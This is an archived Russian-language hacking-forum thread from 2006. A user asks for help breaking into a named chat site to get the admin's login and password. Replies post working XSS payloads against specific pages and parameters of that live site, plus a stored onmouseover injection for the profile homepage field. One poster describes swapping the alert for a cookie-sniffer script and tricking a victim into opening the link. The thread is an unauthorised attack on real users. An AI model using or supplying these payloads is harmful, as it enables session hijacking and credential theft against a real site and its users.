PDA

Просмотр полной версии : Помогите взломать !!!!


kord
04.10.2006, 19:28
http://chat.russianamerica.com:8080/ помогите узнать логин админа и код с уважением Автоматический гранатамёт Стечкина.

Sn@k3
04.10.2006, 21:06
Не нравиц мне та надпись Russian Amerika, будет время помогу!!!!!

kord
04.10.2006, 22:45
помоги чем можешь.

nc.STRIEM
04.10.2006, 23:36
первое че брасаеться в глаза это пасив на главной странице



http://chat.russianamerica.com:8080/login?login=%22%3E%3Cscript%3Ealert(document.cooki e)%3C/script%3E

ток пробел над убрать в document.cookie
буду смотреть дальше...

-- в профиле не фильтруються двойные кавычки

Kaban
04.10.2006, 23:54
вот и я нашел
http://chat.russianamerica.com:8080/StPic?n='><script>alert(/Kaban/)</script>
XSS эта вроде работает, только когда под ником сидишь

nc.STRIEM
05.10.2006, 00:05
вот и я нашел
http://chat.russianamerica.com:8080/StPic?n='><script>alert(/Kaban/)</script>
XSS эта вроде работает, только когда под ником сидишь
ну вот те пожалуст!
осталось заместо алерта подставить скрипт для сниффера и впарить комут ссылку! уже проверил работает!

Kaban
05.10.2006, 00:11
вроде тоже проходит
http://chat.russianamerica.com:8080/Gallery?s=%22%3E%3Cscript%3Ealert(/Kaban/)%3C/script%3E

nc.STRIEM
05.10.2006, 00:39
Еще нашол в профиле полуактивную xss в поле Домашняя страничка: вставляеш

" onmouseover=javascript:alert(document.cookie) "

при наведение срабатывает

kord
05.10.2006, 08:56
Хакеры а что именно открываеться что то я не пойму что можно с этим делать и что логин и пароль админа не узнать?

Kaban
05.10.2006, 10:19
вот в этой статье всё прекрасно описано что делать, как делать и зачем делать.
http://forum.antichat.ru/thread20140.html

гейлордфакерЪ
17.10.2006, 22:46
приятно было полистать и почитать .. прям как 3д картину рассматривал ... красифа